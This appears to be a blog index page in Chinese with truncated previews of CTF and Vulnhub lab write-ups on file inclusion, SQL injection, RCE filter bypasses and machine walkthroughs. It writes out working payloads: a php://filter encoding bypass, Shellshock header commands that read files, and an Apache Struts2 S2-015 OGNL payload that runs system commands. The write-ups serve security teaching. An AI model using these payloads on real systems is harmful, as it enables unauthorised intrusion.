CTFhub RCE
CTFhub RCE题目复现 eval执行打开题目
蚁剑连接
之后找flag
问题解决
题目复现 ctfhub 文件包含打开题目环境
12345if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; }
重点代码我们分析
这里有一个strpos(string,find,start)函数
意思在string字符串中找find的位置,start是查找的开始位置
那么这句代码的意思就是如果file中没有flag字符串就执行下面的include $_GET["file"]
否则就输出Hacker。
shell.txt 内容
是将ctfhub传的参数用php执行
题目的目的也是让我们执行shell木马那么我们就输入
1http://challenge-23e2c213e6139 ...
SQL注入系统学习
Ctfhub Web-SQL注入mysql 命令sql 命令使用1234567891.基本查询select *from 表名 查找表内所有内容使用SELECT * FROM students时,SELECT是关键字,表示将要执行一个查询,*表示“所有列”,FROM表示将要从哪个表查询2.条件查询例如,要指定条件“查找user表里面username='flag'”,写成WHERE条件就是select *from user where username='flag' ;。其中,WHERE关键字后面username='flag'的就是条件。username是列名,该列存储了学生的成绩,因此,username='flag'就筛选出了指定条件的记录:3.投影查询例如,从user表中返回id、username和password这三列:SELECT id, password, username FROM user;
123456784.排序例如按照成绩从低到高进行排序:select id,username, ...
暑期结束赛
暑期结束赛simple_php知识点:文件包含 ,二次编码。
打开题目环境
过滤了许多
我们使用伪协议
我们给base字符中的b二次url加密%2562即可绕过
1url/?file=php://filter/read=convert.%2562ase64-encode/resource=/flag.php
之后base64解码
ok,解决
ez RCE知识点: rce绕过通配符及环境变量调用命令使用
打开题目环境
123456789<?phpif(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-8]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.* ...
【渗透测试】VulnhubWest-Wild-v1.1
【渗透测试】VulnhubWest-Wild-v1.1一.渗透环境环境准备Vulnhub靶机下载:官网地址 : WestWild: 1.1 ~ VulnHub
12攻击机:192.168.207.130 本机靶机:192.168.207.131
安装靶机请看文章:靶机导入到虚拟机教程 | Luo 666 (mikuuu.icu)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag
开始渗透
二. 信息收集1. 主机扫描1arp-scan -l
2.端口扫描使用nmap获取目标靶机开放的端口
1nmap -sS -sV -sC -p- 192.168.207.128 -oN nmap_full_scan
发现22 80 139 445 四个端口开放
3.漏洞扫描和目录扫描这里我们扫描漏洞,发现80端口有一个**CVE:CVE-2007-6750**,上网查找资料,发现是一个让对方网站上不了网的一个漏洞,这里对我们渗透靶机没有帮助
12nmap --script=vul ...
靶机导入到虚拟机教程
安装靶机导入到虚拟机教程在你导入靶机时先看看此文章
这里推荐进阶渗透的靶场
12345678910111213141516171819202122232425262728293031323334353637383940414243444546Holynix: v1 DE-ICE:S1.120 21 LTR: Scene1 Kioptrix : Level 1.2 Skytower Fristileaks Breach 2.1 Zico 2 RickdiculouslyEasy Dina Depth The Ether: Evil Science Basic penetration DerpNStink W1R3S.inc Bob:1.0.1 The blackmarket Violator Basic Pentesting : 2 Temple of Doom Wakanda : 1 Matrix : 1 KFIOFan : 1 W34n3ss 1 Replay : 1 Unknowndevice64 : 1 Web Developer : 1 SP ike DC-2 DC6 Born ...
【渗透测试】Vulnhub DC-2
【渗透测试】Vulnhub DC-2一.渗透环境环境准备Vulnhub靶机下载:官网地址下载:DC: 2 ~ VulnHub
12攻击机:192.168.207.130 本机靶机:192.168.207.131
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag
开始渗透
二.信息收集1.主机扫描1arp-scan -l
2.端口扫描1nmap -sS -sV -sC -p- 192.168.207.132 -oN nmap_full_scan
开放了,7744和80端口。
3.访问web网站
出问题所以我们得去更改dns设置
在kali中先去kali访问对应目录
1cd etc/hosts
然后去加上ip
使用命令
1vim etc/hosts
打开
并添加好
添加先点击 ‘i’ 进行编辑
然后输入 192.168.207.132 dc-2
输入 ’shift+;‘快捷键 输入wq 保存
在windows中去到目录**C:\Windows\System3 ...
【渗透测试】Vulnhub Broken:Gallery
【渗透测试】Vulnhub Broken: Gallery一.渗透环境环境准备Vulnhub靶机下载:官网地址:https://download.vulnhub.com/broken/Broken.7z
12攻击机:192.168.207.130靶机:192.168.207.131
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag
进行渗透二.信息收集1.主机扫描1arp-scan -l
可以发现目标靶机地址为192.168.207.131,然后用nmap对靶机进行详细地扫描。
2.端口扫描使用nmap获取目标靶机开放的端口
1nmap -sS -sV -sC -p- 192.168.207.131 -oN nmap_full_scan
发现22,80端口开放
接着目录扫描去
3.目录扫描1dirsearch -u 192.168.207.131
我们可以发现有两个文件,接着访问网站就可以看到
4.登录网站并查找漏洞
我们打开README.md
发现全是0x16 ...
【渗透测试】Vulnhub DC 3
【渗透测试】Vulnhub DC-3一.渗透环境环境准备Vulnhub靶机下载:官网地址:https://www.vulnhub.com/entry/dc-32,312/
12攻击机:192.168.207.130靶机:192.168.207.128
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag
进行渗透二. 信息收集1. 主机扫描1arp-scan -l
发现靶机的IP地址为 192.168.207.128,然后用nmap对靶机进行详细地扫描。
2.端口扫描使用nmap获取目标靶机开放的端口
1nmap -sS -sV -sC -p- 192.168.207.128 -oN nmap_full_scan
只开了80端口。
我们访问看看
登录界面
3.目录查找1dirsearch -u 192.168.207.128
利用dirsearch工具,可与看到administrator这个目录,应该是后台
4.登录网站并查找漏洞我们看看网站
一个著名的CMS系统 ...
墨者Bash漏洞分析溯源
墨者Bash漏洞分析溯源
打开题目环境
Bash漏洞存在的路径多数在网页/cgi-bin/下,打开此网页。
1http://url/cgi-bin/poc.cgi
此漏洞是存在的,使用bp抓包
把在下面的Connection的参数,改成我们的执行代码。
1Connection: () { :;}; echo; /bin/ls /
继续执行我们的命令 看key.txt
1Connection: () { :;}; echo; /bin/cat /key.txt
问题解决
墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现
墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现第一种构建poc打开题目靶机
输入/${1+1}.action。发现表达式被执行,证明存在漏洞。可以利用rce漏洞
去看漏洞我们可知道
poc:
1${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),#q}.action
之后需要url编码加密
1%24%7b%23context%5b%27xwork ...